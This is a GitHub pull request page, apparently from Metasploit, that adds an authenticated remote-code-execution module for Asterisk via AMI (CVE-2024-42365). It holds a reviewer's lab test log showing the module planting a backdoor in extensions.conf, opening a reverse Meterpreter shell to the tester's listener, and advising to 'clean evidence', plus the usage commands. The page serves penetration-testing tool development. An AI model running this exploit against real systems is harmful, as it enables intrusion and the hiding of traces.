Asterisk authenticated rce via AMI (CVE-2024-42365) #19613
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
h00die
commented
Nov 4, 2024
documentation/modules/exploit/linux/misc/asterisk_ami_originate_auth_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/misc/asterisk_ami_originate_auth_rce.md
Outdated
Show resolved
Hide resolved
h00die
changed the title
jvoisin
reviewed
Nov 4, 2024
jheysel-r7
reviewed
Nov 7, 2024
|
Everything else should be addressed! |
jheysel-r7
reviewed
Nov 28, 2024
There was a problem hiding this comment.
Thanks for the module @h00die. Looks good, just few minor comments. Testing was as expected:
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set username testuser
username => testuser
smsf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set password testuser
password => testuser
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set verbose true
verbose => true
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > run
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.243:5038 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.243:5038 - Connecting...
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[*] 192.168.123.243:5038 - Authenticating as 'testuser'
[!] 192.168.123.243:5038 - No active DB -- Credential data will not be saved!
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Checking Asterisk version
[!] 192.168.123.243:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
[*] 192.168.123.243:5038 - Connecting...
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[*] 192.168.123.243:5038 - Authenticating as 'testuser'
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Using new context name: VTRmMAvWcc
[*] 192.168.123.243:5038 - Loading conf file
[+] 192.168.123.243:5038 - Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Setting backdoor
[+] 192.168.123.243:5038 - Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Reloading config
[+] 192.168.123.243:5038 - Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Triggering shellcode
[*] Sending stage (24772 bytes) to 192.168.123.243
[+] 192.168.123.243:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.243:40994) at 2024-11-28 10:02:39 -0800
meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer : freepbx.sangoma.local
OS : Linux 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter > exit
documentation/modules/exploit/linux/misc/asterisk_ami_originate_auth_rce.md
Outdated
Show resolved
Hide resolved
|
Just tested w/ all changes, still working just fine :) |
jheysel-r7
approved these changes
Nov 29, 2024
|
Thanks for making those changes! I also just retested and everything was working perfectly :) Landing now |
Release NotesAdds and authenticated RCE module for Asterisk via AMI. This vulnerability is tracked as CVE-2024-42365. This also moves the underlying functionality that enables the module to interact with the Asterisk application, originally written by @bcoles, to a library. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Fixes #19388
Authenticated RCE for Asterisk via AMI for users with originate access, CVE-2024-42365. Hats off to @bcoles for writing a bunch of the underlying functionality which I'm going to move into a lib. Exploit works with certain payloads, needs a cleanup and some more robustness.
use exploit/linux/misc/asterisk_ami_originate_auth_rceset rhosts <rhost>set lhost <lhost>set username <username>set password <password>